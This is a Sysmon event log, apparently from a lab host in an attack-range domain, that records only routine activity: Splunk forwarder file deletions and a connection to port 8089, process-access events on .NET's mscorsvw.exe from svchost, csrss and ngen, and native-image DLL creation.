EventRecordID=20218; EventID=23 (FileDelete); RuleName=-; UtcTime=2021-06-23 21:03:41.284; ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01}; ProcessId=3068; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=02300F557A0F06B16E8DD5958E02FCFC,SHA256=30DE3812B61EEB6F7788A61E150A3D253E953696871DAA3AA4522CA0FD3D0B70,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=20217; EventID=3 (NetworkConnect); RuleName=-; UtcTime=2021-06-23 21:03:39.135; ProcessGuid={4DB9351A-9DEA-60D3-3000-00000000CF01}; ProcessId=2404; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; User=NT AUTHORITY\SYSTEM; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.14; SourceHostname=win-dc-663.attackrange.local; SourcePort=61416; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.12; DestinationHostname=-; DestinationPort=8089; DestinationPortName=-
EventRecordID=20226; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:42.909; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=368; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A1AE-60D3-5203-00000000CF01}; TargetProcessId=6400; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=20225; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:42.893; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=496; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A1AE-60D3-5203-00000000CF01}; TargetProcessId=6400; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=20224; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:42.878; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=6420; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A1AE-60D3-5203-00000000CF01}; TargetProcessId=6400; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x103801; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)
EventRecordID=20223; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:42.846; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=368; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A1AE-60D3-5103-00000000CF01}; TargetProcessId=5516; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=20222; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:42.831; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=432; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A1AE-60D3-5103-00000000CF01}; TargetProcessId=5516; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=20221; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:42.815; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A1AE-60D3-5103-00000000CF01}; TargetProcessId=5516; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x103801; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)
EventRecordID=20220; EventID=11 (FileCreate); RuleName=DLL; UtcTime=2021-06-23 21:03:42.643; ProcessGuid={4DB9351A-A1AB-60D3-5003-00000000CF01}; ProcessId=6296; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1898-0\Microsoft.Build.dll; CreationUtcTime=2021-06-23 21:03:42.643
EventRecordID=20219; EventID=23 (FileDelete); RuleName=-; UtcTime=2021-06-23 21:03:42.378; ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01}; ProcessId=3068; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=7BE9274D0A68849DE080A5A273EBD1E6,SHA256=A89EBD812B5C3B5AA38C65F540E78CF2F7BEF314098DAF0C227E3F0182F96CA5,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=20235; EventID=23 (FileDelete); RuleName=-; UtcTime=2021-06-23 21:03:43.815; ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01}; ProcessId=3068; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security; Hashes=MD5=2ED6036A40EABCE5086B9846D75421C2,SHA256=7116A52A3CFCE855B8468952A841036BE9598F6CCA9504A029ECD5B7FB07BE5E,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=20234; EventID=23 (FileDelete); RuleName=-; UtcTime=2021-06-23 21:03:43.471; ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01}; ProcessId=3068; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=C257FCFD58E76ED66575EB77DCA247F7,SHA256=AA118C05019E1948F3EC25EA6EDDD29018050C3F38E9849CB70DA91ABD802FF7,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=20233; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:43.175; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=368; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A1AF-60D3-5403-00000000CF01}; TargetProcessId=6652; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=20232; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:43.159; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=432; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A1AF-60D3-5403-00000000CF01}; TargetProcessId=6652; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=20231; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:43.159; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=6420; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A1AF-60D3-5403-00000000CF01}; TargetProcessId=6652; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x103801; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)
EventRecordID=20230; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:43.112; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=368; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A1AF-60D3-5303-00000000CF01}; TargetProcessId=4372; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=20229; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:43.096; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=432; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A1AF-60D3-5303-00000000CF01}; TargetProcessId=4372; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=20228; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:43.096; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A1AF-60D3-5303-00000000CF01}; TargetProcessId=4372; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x103801; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)
EventRecordID=20227; EventID=11 (FileCreate); RuleName=DLL; UtcTime=2021-06-23 21:03:43.003; ProcessGuid={4DB9351A-A1AE-60D3-5203-00000000CF01}; ProcessId=6400; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1900-0\Microsoft.Build.Conversion.v4.0.dll; CreationUtcTime=2021-06-23 21:03:43.003
EventRecordID=20251; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:44.800; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=368; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A1B0-60D3-5803-00000000CF01}; TargetProcessId=6492; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=20250; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:44.784; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=496; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A1B0-60D3-5803-00000000CF01}; TargetProcessId=6492; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=20249; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:44.784; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=6420; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A1B0-60D3-5803-00000000CF01}; TargetProcessId=6492; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x103801; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)
EventRecordID=20248; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:44.690; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=368; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A1B0-60D3-5703-00000000CF01}; TargetProcessId=4152; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=20247; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:44.659; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=496; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A1B0-60D3-5703-00000000CF01}; TargetProcessId=4152; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=20246; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:44.659; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A1B0-60D3-5703-00000000CF01}; TargetProcessId=4152; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x103801; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)
